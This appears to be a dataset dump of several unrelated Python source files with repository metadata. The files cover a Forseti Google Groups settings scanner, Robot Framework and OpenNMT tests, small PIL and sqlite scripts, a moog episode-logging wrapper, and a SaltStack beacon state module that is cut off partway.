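# Invented, reduced stand-in for the real RuleViolation namedtuple.
RuleViolation = namedtuple('RuleViolation', ['group_email', 'whoCanJoin', 'rule_name'])

def flatten(violations):
    for v in violations:
        yield {
            'resource_id': v.group_email,
            'resource_data': json.dumps({'whoCanJoin': v.whoCanJoin}, sort_keys=True),
            'rule_name': v.rule_name,
        }

for row in flatten([RuleViolation('team@example.com', 'ANYONE_CAN_JOIN', 'no-public-groups')]):
    print(row)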
| 40.613497
| 79
| 0.616465
|
import json
from google.cloud.forseti.common.gcp_type import groups_settings
from google.cloud.forseti.common.util import logger
from google.cloud.forseti.scanner.audit import groups_settings_rules_engine
from google.cloud.forseti.scanner.scanners import base_scanner
LOGGER = logger.get_logger(__name__)
class GroupsSettingsScanner(base_scanner.BaseScanner):
def __init__(self, global_configs, scanner_configs, service_config,
model_name, snapshot_timestamp, rules):
super(GroupsSettingsScanner, self).__init__(
global_configs,
scanner_configs,
service_config,
model_name,
snapshot_timestamp,
rules)
self.rules_engine = (groups_settings_rules_engine.
GroupsSettingsRulesEngine(
rules_file_path=self.rules,
snapshot_timestamp=self.snapshot_timestamp))
self.rules_engine.build_rule_book(self.global_configs)
@staticmethod
def _flatten_violations(violations):
for violation in violations:
resource_data = {
'whoCanAdd': violation.whoCanAdd,
'whoCanJoin': violation.whoCanJoin,
'whoCanViewMembership': violation.whoCanViewMembership,
'whoCanViewGroup': violation.whoCanViewGroup,
'whoCanInvite': violation.whoCanInvite,
'allowExternalMembers': violation.allowExternalMembers,
'whoCanLeaveGroup': violation.whoCanLeaveGroup,
}
yield {
'resource_id': violation.group_email,
'full_name': violation.group_email,
'resource_name': violation.group_email,
'resource_data': json.dumps(resource_data, sort_keys=True),
'violation_data': violation.violation_reason,
'resource_type': violation.resource_type,
'rule_index': violation.rule_index,
'rule_name': violation.rule_name,
'violation_type': violation.violation_type,
}
def _output_results(self, all_violations):
all_violations = list(self._flatten_violations(all_violations))
self._output_results_to_db(all_violations)
def _find_violations(self, all_groups_settings, iam_groups_settings):
all_violations = []
LOGGER.info('Finding groups settings violations...')
for settings in all_groups_settings:
violations = self.rules_engine.find_violations(settings,
iam_only=False)
LOGGER.debug(violations)
all_violations.extend(violations)
for settings in iam_groups_settings:
violations = self.rules_engine.find_violations(settings,
iam_only=True)
LOGGER.debug(violations)
all_violations.extend(violations)
return all_violations
def _retrieve(self):
all_groups_settings = []
iam_groups_settings = []
model_manager = self.service_config.model_manager
scoped_session, data_access = model_manager.get(self.model_name)
with scoped_session as session:
for settings in data_access.scanner_fetch_groups_settings(session,
True):
email = settings[0].split('group/')[1]
iam_groups_settings.append(groups_settings.GroupsSettings
.from_json(email, settings[1]))
for settings in data_access.scanner_fetch_groups_settings(session,
False):
email = settings[0].split('group/')[1]
all_groups_settings.append(groups_settings.GroupsSettings
.from_json(email, settings[1]))
return (all_groups_settings, iam_groups_settings)
def run(self):
all_groups_settings, iam_groups_settings = self._retrieve()
all_violations = self._find_violations(all_groups_settings,
iam_groups_settings)
self._output_results(all_violations)
| true
| true
|
f7079479714dd2df0cbf8ce1a4319bd654929be3
| 1,638
|
py
|
Python
|
utest/api/test_exposed_api.py
|
moto-timo/robotframework
|
1a26bfc77ea295e298175cd665b5aee0dcbb6699
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
utest/api/test_exposed_api.py
|
moto-timo/robotframework
|
1a26bfc77ea295e298175cd665b5aee0dcbb6699
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
utest/api/test_exposed_api.py
|
moto-timo/robotframework
|
1a26bfc77ea295e298175cd665b5aee0dcbb6699
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
import unittest
from os.path import abspath, join
from robot import api, model, parsing, reporting, result, running
from robot.utils.asserts import assert_equals
class TestExposedApi(unittest.TestCase):
def test_test_case_file(self):
assert_equals(api.TestCaseFile, parsing.TestCaseFile)
def test_test_data_directory(self):
assert_equals(api.TestDataDirectory, parsing.TestDataDirectory)
def test_resource_file(self):
assert_equals(api.ResourceFile, parsing.ResourceFile)
def test_test_data(self):
assert_equals(api.TestData, parsing.TestData)
def test_execution_result(self):
assert_equals(api.ExecutionResult, result.ExecutionResult)
def test_test_suite(self):
assert_equals(api.TestSuite, running.TestSuite)
def test_result_writer(self):
assert_equals(api.ResultWriter, reporting.ResultWriter)
def test_visitors(self):
assert_equals(api.SuiteVisitor, model.SuiteVisitor)
assert_equals(api.ResultVisitor, result.ResultVisitor)
class TestTestSuiteBuilder(unittest.TestCase):
sources = [join(abspath(__file__), '..', '..', '..', 'atest', 'testdata', 'misc', n)
for n in ('pass_and_fail.robot', 'normal.robot')]
def test_create_with_datasources_as_list(self):
suite = api.TestSuiteBuilder().build(*self.sources)
assert_equals(suite.name, 'Pass And Fail & Normal')
def test_create_with_datasource_as_string(self):
suite = api.TestSuiteBuilder().build(self.sources[0])
assert_equals(suite.name, 'Pass And Fail')
if __name__ == '__main__':
unittest.main()
| 30.90566
| 88
| 0.721001
|
import unittest
from os.path import abspath, join
from robot import api, model, parsing, reporting, result, running
from robot.utils.asserts import assert_equals
class TestExposedApi(unittest.TestCase):
def test_test_case_file(self):
assert_equals(api.TestCaseFile, parsing.TestCaseFile)
def test_test_data_directory(self):
assert_equals(api.TestDataDirectory, parsing.TestDataDirectory)
def test_resource_file(self):
assert_equals(api.ResourceFile, parsing.ResourceFile)
def test_test_data(self):
assert_equals(api.TestData, parsing.TestData)
def test_execution_result(self):
assert_equals(api.ExecutionResult, result.ExecutionResult)
def test_test_suite(self):
assert_equals(api.TestSuite, running.TestSuite)
def test_result_writer(self):
assert_equals(api.ResultWriter, reporting.ResultWriter)
def test_visitors(self):
assert_equals(api.SuiteVisitor, model.SuiteVisitor)
assert_equals(api.ResultVisitor, result.ResultVisitor)
class TestTestSuiteBuilder(unittest.TestCase):
sources = [join(abspath(__file__), '..', '..', '..', 'atest', 'testdata', 'misc', n)
for n in ('pass_and_fail.robot', 'normal.robot')]
def test_create_with_datasources_as_list(self):
suite = api.TestSuiteBuilder().build(*self.sources)
assert_equals(suite.name, 'Pass And Fail & Normal')
def test_create_with_datasource_as_string(self):
suite = api.TestSuiteBuilder().build(self.sources[0])
assert_equals(suite.name, 'Pass And Fail')
if __name__ == '__main__':
unittest.main()
| true
| true
|
f707956a41547e296589d686b077ac113a8ab01e
| 537
|
py
|
Python
|
images/thumbs/resize.py
|
GiulioC/GiulioC.github.io
|
8c73c3492682a2830f3552d71b12e5671370a5f4
|
[
"CC-BY-3.0"
] | null | null | null |
images/thumbs/resize.py
|
GiulioC/GiulioC.github.io
|
8c73c3492682a2830f3552d71b12e5671370a5f4
|
[
"CC-BY-3.0"
] | null | null | null |
images/thumbs/resize.py
|
GiulioC/GiulioC.github.io
|
8c73c3492682a2830f3552d71b12e5671370a5f4
|
[
"CC-BY-3.0"
] | null | null | null |
from PIL import Image
import os
percent = 0.5
for file_name in os.listdir("../foto/"):
if file_name == "pic8.jpg":
img = Image.open("../foto/"+str(file_name))
if img.size[0] > img.size[1]:
# horizontal photo
hsize = int((float(img.size[0]) * float(percent)))
vsize = int((float(img.size[1]) * float(percent)))
else:
# vertical photo
hsize = int((float(img.size[0]) * float(percent)))
vsize = int((float(img.size[1]) * float(percent)))
img = img.resize((hsize, vsize), Image.ANTIALIAS)
img.save(file_name)
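Since both branches above apply the same uniform scale, the whole resize reduces to the sketch below; the input path is the script's hard-coded one, and note that Pillow 10+ spells the filter Image.Resampling.LANCZOS instead of Image.ANTIALIAS.

from PIL import Image

percent = 0.5
img = Image.open('../foto/pic8.jpg')  # same hard-coded input as above
new_size = (int(img.size[0] * percent), int(img.size[1] * percent))
img.resize(new_size, Image.ANTIALIAS).save('pic8.jpg')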
| 26.85
| 53
| 0.636872
|
from PIL import Image
import os
percent = 0.5
for file_name in os.listdir("../foto/"):
if file_name == "pic8.jpg":
img = Image.open("../foto/"+str(file_name))
if img.size[0] > img.size[1]:
hsize = int((float(img.size[0]) * float(percent)))
vsize = int((float(img.size[1]) * float(percent)))
else:
hsize = int((float(img.size[0]) * float(percent)))
vsize = int((float(img.size[1]) * float(percent)))
img = img.resize((hsize, vsize), Image.ANTIALIAS)
img.save(file_name)
| true
| true
|
f70796526017f9efdb2926f8a2f313915650ea0a
| 453
|
py
|
Python
|
sql/makedb.py
|
amenoyoya/pyrpn
|
5174cf90f9dc1c43df2d04a0545ce96fe2a434ce
|
[
"MIT"
] | null | null | null |
sql/makedb.py
|
amenoyoya/pyrpn
|
5174cf90f9dc1c43df2d04a0545ce96fe2a434ce
|
[
"MIT"
] | null | null | null |
sql/makedb.py
|
amenoyoya/pyrpn
|
5174cf90f9dc1c43df2d04a0545ce96fe2a434ce
|
[
"MIT"
] | null | null | null |
import sqlite3
from contextlib import closing
with closing(sqlite3.connect('sample.db')) as conn:
c = conn.cursor()
c.execute('create table users (id integer primary key, name varchar, age integer, gender varchar)')
c.executemany('insert into users (name, age, gender) values (?, ?, ?)', [
('Alex', 54, 'male'),
('Nancy', 40, 'female'),
('Tetsu', 16, 'male'),
('Saki', 21, 'female')
])
conn.commit()
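To confirm what the script created, the rows can be read back from the same database file; this assumes makedb.py has already run in the working directory.

import sqlite3
from contextlib import closing

with closing(sqlite3.connect('sample.db')) as conn:
    for row in conn.execute('select id, name, age, gender from users'):
        print(row)  # e.g. (1, 'Alex', 54, 'male')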
| 32.357143
| 103
| 0.593819
|
import sqlite3
from contextlib import closing
with closing(sqlite3.connect('sample.db')) as conn:
c = conn.cursor()
c.execute('create table users (id integer primary key, name varchar, age integer, gender varchar)')
c.executemany('insert into users (name, age, gender) values (?, ?, ?)', [
('Alex', 54, 'male'),
('Nancy', 40, 'female'),
('Tetsu', 16, 'male'),
('Saki', 21, 'female')
])
conn.commit()
| true
| true
|
f70796987ba6b1df037b3a85288d3b9336d7b3b7
| 1,066
|
py
|
Python
|
onmt/tests/test_attention.py
|
deep-spin/SIGMORPHON2019
|
60cf3b53be42e76238e7928405b2916cd9aed6c4
|
[
"MIT"
] | 2
|
2019-07-30T06:50:21.000Z
|
2020-02-05T17:42:06.000Z
|
onmt/tests/test_attention.py
|
deep-spin/SIGMORPHON2019
|
60cf3b53be42e76238e7928405b2916cd9aed6c4
|
[
"MIT"
] | 1
|
2019-08-20T08:57:21.000Z
|
2019-08-21T08:49:48.000Z
|
onmt/tests/test_attention.py
|
deep-spin/SIGMORPHON2019
|
60cf3b53be42e76238e7928405b2916cd9aed6c4
|
[
"MIT"
] | null | null | null |
"""
Here come the tests for attention types and their compatibility
"""
import unittest
import torch
from torch.autograd import Variable
import onmt
class TestAttention(unittest.TestCase):
def test_masked_global_attention(self):
source_lengths = torch.IntTensor([7, 3, 5, 2])
# illegal_weights_mask = torch.ByteTensor([
# [0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 1, 1, 1, 1],
# [0, 0, 0, 0, 0, 1, 1],
# [0, 0, 1, 1, 1, 1, 1]])
batch_size = source_lengths.size(0)
dim = 20
memory_bank = Variable(torch.randn(batch_size,
source_lengths.max(), dim))
hidden = Variable(torch.randn(batch_size, dim))
attn = onmt.modules.Attention(dim)
_, alignments = attn(hidden, memory_bank,
memory_lengths=source_lengths)
# TODO: fix for pytorch 0.3
# illegal_weights = alignments.masked_select(illegal_weights_mask)
# self.assertEqual(0.0, illegal_weights.data.sum())
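The commented-out assertions describe a mask over attention positions at or beyond each source length; the standalone sketch below derives that mask from the same lengths by broadcasting, which is one way to reconstruct it.

import torch

source_lengths = torch.IntTensor([7, 3, 5, 2])
max_len = int(source_lengths.max())
positions = torch.arange(max_len).unsqueeze(0)  # shape (1, max_len)
# True wherever the position index is at or beyond the source length.
illegal_weights_mask = positions >= source_lengths.unsqueeze(1).long()
print(illegal_weights_mask.int())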
| 28.810811
| 74
| 0.578799
|
import unittest
import torch
from torch.autograd import Variable
import onmt
class TestAttention(unittest.TestCase):
def test_masked_global_attention(self):
source_lengths = torch.IntTensor([7, 3, 5, 2])
batch_size = source_lengths.size(0)
dim = 20
memory_bank = Variable(torch.randn(batch_size,
source_lengths.max(), dim))
hidden = Variable(torch.randn(batch_size, dim))
attn = onmt.modules.Attention(dim)
_, alignments = attn(hidden, memory_bank,
memory_lengths=source_lengths)
| true
| true
|
f70796dac00ff61d01f1195184eb507855798a0c
| 8,878
|
py
|
Python
|
moog/env_wrappers/logger.py
|
jazlab/moog.github.io
|
3e89e46a5918d59475851f9d4f1558956c110d38
|
[
"Apache-2.0",
"MIT"
] | 22
|
2021-02-26T18:19:35.000Z
|
2022-03-05T19:01:00.000Z
|
moog/env_wrappers/logger.py
|
jazlab/moog.github.io
|
3e89e46a5918d59475851f9d4f1558956c110d38
|
[
"Apache-2.0",
"MIT"
] | 1
|
2021-04-01T06:15:02.000Z
|
2021-04-23T13:14:12.000Z
|
moog/env_wrappers/logger.py
|
jazlab/moog.github.io
|
3e89e46a5918d59475851f9d4f1558956c110d38
|
[
"Apache-2.0",
"MIT"
] | 2
|
2021-05-02T02:20:39.000Z
|
2021-05-06T16:24:35.000Z
|
"""Environment wrapper class for logging episodes.
This can be used to record data from a subject playing the task. See
../../moog_demos/restore_logged_data.py for an example of how to read log files.
Note: This logger records everything about the environment, which can be a lot
of data (depending on the task). If you plan to use this at scale for recording
subjects' or agents' behavior, we recommend forking this and modifying it to
only log the data that you need to do analyses for your specific task. For
example you may not want to log the positions/velocities of static sprites
(e.g. walls), or may not want to log all the attributes of sprites every
timestep (e.g. if you know that the colors of the sprites don't change in your
task).
"""
import copy
from datetime import datetime
import json
import logging
import numpy as np
import os
import time
from moog import env_wrappers
from moog import sprite
# This is the number of numerals in filenames. Since there is one file per
# episode, you should pick _FILENAME_ZFILL large enough that the number of
# episodes in your dataset is less than 10^_FILENAME_ZFILL.
_FILENAME_ZFILL = 5
class VertexLogging():
NEVER = 'NEVER'
ALWAYS = 'ALWAYS'
WHEN_NECESSARY = 'WHEN_NECESSARY'
def _serialize(x):
"""Serialize a value x.
This is used to serialize sprite attributes, actions, and meta_state so that
they are json-writable.
Specifically, numpy arrays are not JSON serializable, so we must convert
numpy arrays to lists. This function is recursive to handle nestings inside
of lists/tuples/dictionaries.
Args:
x: Value to serialize.
Returns:
Serialized value that can be JSON dumped.
"""
if isinstance(x, np.ndarray):
return x.tolist()
elif isinstance(x, (np.float32, np.float64)):
return float(x)
elif isinstance(x, (np.int32, np.int64)):
return int(x)
elif isinstance(x, list):
return [_serialize(a) for a in x]
elif isinstance(x, tuple):
return tuple([_serialize(a) for a in x])
elif isinstance(x, dict):
return {k: _serialize(v) for k, v in x.items()}
else:
return x
class LoggingEnvironment(env_wrappers.AbstractEnvironmentWrapper):
"""Environment class for logging timesteps.
This logger produces a description of the log in 'description.txt' of
log_dir, so please refer to that for a detailed account of the structure of
the logs.
"""
def __init__(self, environment, log_dir='logs',
log_vertices='WHEN_NECESSARY'):
"""Constructor.
Args:
environment: Instance of ../moog/environment.Environment.
log_dir: String. Log directory relative to working directory.
log_vertices: String. Of the following options:
* 'NEVER'. In this case, never log sprite vertices.
* 'WHEN_NECESSARY'. In this case, log sprite vertices when a
sprite has either just appeared or just changed shape. In
this way, the vertices of a sprite can always be inferred
from the current position/angle/aspect_ratio and the
vertices that were logged for that sprite (identifiable by
its id) the last time its vertices were logged.
* 'ALWAYS'. Log vertices for all sprites every timestep.
"""
super(LoggingEnvironment, self).__init__(environment)
# Make sure log_vertices is a valid value
if not hasattr(VertexLogging, log_vertices):
raise ValueError('log_vertices is {} but must be in VertexLogging '
'values'.format(log_vertices))
self._log_vertices = log_vertices
# Set the logging directory
now_str = datetime.now().strftime("%Y_%m_%d_%H_%M_%S")
if log_dir[0] == '/':
log_dir = os.path.join(log_dir, now_str)
else:
log_dir = os.path.join(os.getcwd(), log_dir, now_str)
os.makedirs(log_dir)
self._log_dir = log_dir
# These are the attributes that we'll log
self._attributes = list(sprite.Sprite.FACTOR_NAMES) + ['id']
# Log attribute list
attributes_filename = os.path.join(self._log_dir, 'attributes.txt')
logging.info('Logging attribute list {} to {}.'.format(
self._attributes, attributes_filename))
with open(attributes_filename, 'w') as f:
json.dump(self._attributes, f)
# Log description
self._log_description()
# Initialize self._episode_log
self._episode_count = 0
self._episode_log = []
def _log_description(self):
"""Log a description of the data to a description.txt file."""
description_filename = os.path.join(self._log_dir, 'description.txt')
logging.info('Logging description to {}.'.format(description_filename))
description = (
'Each numerical file in this directory is an episode of the task. '
'Each such file contains a json-serialized list, each element of '
'which represents an environment step in the episode. Each step is '
'a list of six elements, [[`time`, time], [`reward`, reward], '
'[`step_type`, step_type], [`action`, action], [`meta_state`, '
'meta_state], state].'
'\n\n'
'\n\n'
'time is a timestamp of the timestep.'
'\n\n'
'\n\n'
'reward contains the value of the reward at that step.'
'\n\n'
'\n\n'
'step_type indicates the dm_env.StepType of that step, i.e. '
'whether it was first, mid, or last.'
'\n\n'
'\n\n'
'action contains the agent action for the step.'
'\n\n'
'\n\n'
'meta_state is the serialized meta_state of the environment.'
'\n\n'
'\n\n'
'state is a list, each element of which represents a layer in the '
'environment state. The layer is represented as a list [k, [], [], '
'[], ...], where k is the layer name and the subsequent elements '
'are serialized sprites. Each serialized sprite is a list of '
'attributes. See attributes.txt for the attributes contained.'
)
if self._log_vertices == VertexLogging.ALWAYS:
description += (
' Furthermore, a list of vertices is appended to the attribute '
'list for each serialized sprite.'
)
elif self._log_vertices == VertexLogging.WHEN_NECESSARY:
description += (
'\n\n'
'\n\n'
'Furthermore, a list of vertices is appended to the attribute '
'list for a serialized sprite for the first timestep in which that '
'serialized sprite appears, or when the sprite has changed '
'shape.'
)
with open(description_filename, 'w') as f:
f.write(description)
def _serialize_sprite(self, s):
"""Serialize a sprite as a list of attributes."""
attributes = [_serialize(getattr(s, x)) for x in self._attributes]
if (self._log_vertices == VertexLogging.ALWAYS or
(self._log_vertices == VertexLogging.WHEN_NECESSARY and
s.just_set_shape)):
attributes.append(s.vertices.tolist())
s.just_set_shape = False
return attributes
def _serialized_state(self):
"""Serialized a state."""
serialized_state = [
[k, [self._serialize_sprite(s) for s in self.state[k]]]
for k in self.state
]
return serialized_state
def step(self, action):
"""Step the environment with an action, logging timesteps."""
timestep = self._environment.step(action)
str_timestep = (
[['time', time.time()],
['reward', timestep.reward],
['step_type', timestep.step_type.value],
['action', _serialize(action)],
['meta_state', _serialize(self._environment.meta_state)],
self._serialized_state()]
)
self._episode_log.append(str_timestep)
if timestep.last():
# Write the episode to a log file
episode_count_str = str(self._episode_count).zfill(_FILENAME_ZFILL)
filename = os.path.join(self._log_dir, episode_count_str)
logging.info('Logging episode {} to {}.'.format(
self._episode_count, filename))
with open(filename, 'w') as f:
json.dump(self._episode_log, f)
self._episode_count += 1
self._episode_log = []
return timestep
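Following the format documented in _log_description, one episode file can be read back as sketched below; the path is a placeholder for an actual run's log directory.

import json

with open('logs/2024_01_01_00_00_00/00000') as f:  # placeholder path
    episode = json.load(f)

first_step = episode[0]
(_, t), (_, reward), (_, step_type), (_, action), (_, meta_state) = first_step[:5]
state = first_step[5]
print(t, reward, step_type)
for layer_name, sprites in state:
    print(layer_name, len(sprites), 'sprites')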
| 39.457778
| 80
| 0.614553
|
import copy
from datetime import datetime
import json
import logging
import numpy as np
import os
import time
from moog import env_wrappers
from moog import sprite
_FILENAME_ZFILL = 5
class VertexLogging():
NEVER = 'NEVER'
ALWAYS = 'ALWAYS'
WHEN_NECESSARY = 'WHEN_NECESSARY'
def _serialize(x):
if isinstance(x, np.ndarray):
return x.tolist()
elif isinstance(x, (np.float32, np.float64)):
return float(x)
elif isinstance(x, (np.int32, np.int64)):
return int(x)
elif isinstance(x, list):
return [_serialize(a) for a in x]
elif isinstance(x, tuple):
return tuple([_serialize(a) for a in x])
elif isinstance(x, dict):
return {k: _serialize(v) for k, v in x.items()}
else:
return x
class LoggingEnvironment(env_wrappers.AbstractEnvironmentWrapper):
def __init__(self, environment, log_dir='logs',
log_vertices='WHEN_NECESSARY'):
super(LoggingEnvironment, self).__init__(environment)
if not hasattr(VertexLogging, log_vertices):
raise ValueError('log_vertices is {} but must be in VertexLogging '
'values'.format(log_vertices))
self._log_vertices = log_vertices
now_str = datetime.now().strftime("%Y_%m_%d_%H_%M_%S")
if log_dir[0] == '/':
log_dir = os.path.join(log_dir, now_str)
else:
log_dir = os.path.join(os.getcwd(), log_dir, now_str)
os.makedirs(log_dir)
self._log_dir = log_dir
self._attributes = list(sprite.Sprite.FACTOR_NAMES) + ['id']
# Log attribute list
attributes_filename = os.path.join(self._log_dir, 'attributes.txt')
logging.info('Logging attribute list {} to {}.'.format(
self._attributes, attributes_filename))
with open(attributes_filename, 'w') as f:
json.dump(self._attributes, f)
# Log description
self._log_description()
# Initialize self._episode_log
self._episode_count = 0
self._episode_log = []
def _log_description(self):
description_filename = os.path.join(self._log_dir, 'description.txt')
logging.info('Logging description to {}.'.format(description_filename))
description = (
'Each numerical file in this directory is an episode of the task. '
'Each such file contains a json-serialized list, each element of '
'which represents an environment step in the episode. Each step is '
'a list of six elements, [[`time`, time], [`reward`, reward], '
'[`step_type`, step_type], [`action`, action], [`meta_state`, '
'meta_state], state].'
'\n\n'
'\n\n'
'time is a timestamp of the timestep.'
'\n\n'
'\n\n'
'reward contains the value of the reward at that step.'
'\n\n'
'\n\n'
'step_type indicates the dm_env.StepType of that step, i.e. '
'whether it was first, mid, or last.'
'\n\n'
'\n\n'
'action contains the agent action for the step.'
'\n\n'
'\n\n'
'meta_state is the serialized meta_state of the environment.'
'\n\n'
'\n\n'
'state is a list, each element of which represents a layer in the '
'environment state. The layer is represented as a list [k, [], [], '
'[], ...], where k is the layer name and the subsequent elements '
'are serialized sprites. Each serialized sprite is a list of '
'attributes. See attributes.txt for the attributes contained.'
)
if self._log_vertices == VertexLogging.ALWAYS:
description += (
' Furthermore, a list of vertices is appended to the attribute '
'list for each serialized sprite.'
)
elif self._log_vertices == VertexLogging.WHEN_NECESSARY:
description += (
'\n\n'
'\n\n'
'Furthermore, a list of vertices is appended to the attribute '
'list for a serialized sprite for the first timestep in which that '
'serialized sprite appears, or when the sprite has changed '
'shape.'
)
with open(description_filename, 'w') as f:
f.write(description)
def _serialize_sprite(self, s):
attributes = [_serialize(getattr(s, x)) for x in self._attributes]
if (self._log_vertices == VertexLogging.ALWAYS or
(self._log_vertices == VertexLogging.WHEN_NECESSARY and
s.just_set_shape)):
attributes.append(s.vertices.tolist())
s.just_set_shape = False
return attributes
def _serialized_state(self):
serialized_state = [
[k, [self._serialize_sprite(s) for s in self.state[k]]]
for k in self.state
]
return serialized_state
def step(self, action):
timestep = self._environment.step(action)
str_timestep = (
[['time', time.time()],
['reward', timestep.reward],
['step_type', timestep.step_type.value],
['action', _serialize(action)],
['meta_state', _serialize(self._environment.meta_state)],
self._serialized_state()]
)
self._episode_log.append(str_timestep)
if timestep.last():
# Write the episode to a log file
episode_count_str = str(self._episode_count).zfill(_FILENAME_ZFILL)
filename = os.path.join(self._log_dir, episode_count_str)
logging.info('Logging episode {} to {}.'.format(
self._episode_count, filename))
with open(filename, 'w') as f:
json.dump(self._episode_log, f)
self._episode_count += 1
self._episode_log = []
return timestep
| true
| true
|
f707972a59bc041da7ae5f9e61e1bed189a32c66
| 7,271
|
py
|
Python
|
salt/states/beacon.py
|
nizD/salt
|
bbe135d62d8d8b4e4a7d0362097e1b3a3b092bed
|
[
"Apache-2.0"
] | 1
|
2020-12-28T09:48:52.000Z
|
2020-12-28T09:48:52.000Z
|
salt/states/beacon.py
|
nizD/salt
|
bbe135d62d8d8b4e4a7d0362097e1b3a3b092bed
|
[
"Apache-2.0"
] | 2
|
2021-04-30T21:36:41.000Z
|
2021-12-13T20:50:09.000Z
|
salt/states/beacon.py
|
nizD/salt
|
bbe135d62d8d8b4e4a7d0362097e1b3a3b092bed
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Management of the Salt beacons
==============================
.. versionadded:: 2015.8.0
.. code-block:: yaml
ps:
beacon.present:
- save: True
- enable: False
- services:
salt-master: running
apache2: stopped
sh:
beacon.present: []
load:
beacon.present:
- averages:
1m:
- 0.0
- 2.0
5m:
- 0.0
- 1.5
15m:
- 0.1
- 1.0
'''
from __future__ import absolute_import, print_function, unicode_literals
# Import Salt libs
from salt.ext import six
import logging
log = logging.getLogger(__name__)
def present(name,
save=False,
**kwargs):
'''
Ensure beacon is configured with the included beacon data.
name
The name of the beacon to ensure is configured.
save
True/False, if True the beacons.conf file will be updated too. Default is False.
'''
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
beacon_data = [{k: v} for k, v in six.iteritems(kwargs)]
if name in current_beacons:
if beacon_data == current_beacons[name]:
ret['comment'].append('Job {0} in correct state'.format(name))
else:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.modify'](name, beacon_data, **kwargs)
ret['comment'].append(result['comment'])
ret['changes'] = result['changes']
else:
result = __salt__['beacons.modify'](name, beacon_data, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
if 'changes' in result:
ret['comment'].append('Modifying {0} in beacons'.format(name))
ret['changes'] = result['changes']
else:
ret['comment'].append(result['comment'])
else:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.add'](name, beacon_data, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.add'](name, beacon_data, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Adding {0} to beacons'.format(name))
if save:
if __opts__.get('test'):
ret['comment'].append('Beacon {0} would be saved'.format(name))
else:
result = __salt__['beacons.save']()
ret['comment'].append('Beacon {0} saved'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
def absent(name,
save=False,
**kwargs):
'''
Ensure beacon is absent.
name
The name of the beacon to ensure is absent.
save
True/False, if True the beacons.conf file will be updated too. Default is False.
'''
### NOTE: The keyword arguments in **kwargs are ignored in this state, but
### cannot be removed from the function definition, otherwise the use
### of unsupported arguments will result in a traceback.
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
if name in current_beacons:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.delete'](name, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.delete'](name, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Removed {0} from beacons'.format(name))
else:
ret['comment'].append('{0} not configured in beacons'.format(name))
if save:
if __opts__.get('test'):
ret['comment'].append('Beacon {0} would be saved'.format(name))
else:
result = __salt__['beacons.save']()
ret['comment'].append('Beacon {0} saved'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
def enabled(name, **kwargs):
'''
Enable a beacon.
name
The name of the beacon to enable.
'''
### NOTE: The keyword arguments in **kwargs are ignored in this state, but
### cannot be removed from the function definition, otherwise the use
### of unsupported arguments will result in a traceback.
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
if name in current_beacons:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.enable_beacon'](name, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.enable_beacon'](name, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Enabled {0} from beacons'.format(name))
else:
ret['comment'].append('{0} not a configured beacon'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
def disabled(name, **kwargs):
'''
Disable a beacon.
name
The name of the beacon to disable.
'''
### NOTE: The keyword arguments in **kwargs are ignored in this state, but
### cannot be removed from the function definition, otherwise the use
### of unsupported arguments will result in a traceback.
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
if name in current_beacons:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.disable_beacon'](name, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.disable_beacon'](name, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Disabled beacon {0}.'.format(name))
else:
ret['comment'].append('Job {0} is not configured.'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
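The beacon_data assembly in present() is easy to see in isolation; the sketch below uses a plain dict and .items() in place of the state's **kwargs and six.iteritems, with invented beacon options.

kwargs = {'interval': 5, 'services': {'salt-master': 'running'}}
# Each keyword argument becomes its own single-key dict, matching the
# list-of-dicts layout that the beacons modules expect.
beacon_data = [{k: v} for k, v in kwargs.items()]
print(beacon_data)  # [{'interval': 5}, {'services': {'salt-master': 'running'}}]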
| 30.809322
| 86
| 0.527438
|
from __future__ import absolute_import, print_function, unicode_literals
from salt.ext import six
import logging
log = logging.getLogger(__name__)
def present(name,
save=False,
**kwargs):
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
beacon_data = [{k: v} for k, v in six.iteritems(kwargs)]
if name in current_beacons:
if beacon_data == current_beacons[name]:
ret['comment'].append('Job {0} in correct state'.format(name))
else:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.modify'](name, beacon_data, **kwargs)
ret['comment'].append(result['comment'])
ret['changes'] = result['changes']
else:
result = __salt__['beacons.modify'](name, beacon_data, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
if 'changes' in result:
ret['comment'].append('Modifying {0} in beacons'.format(name))
ret['changes'] = result['changes']
else:
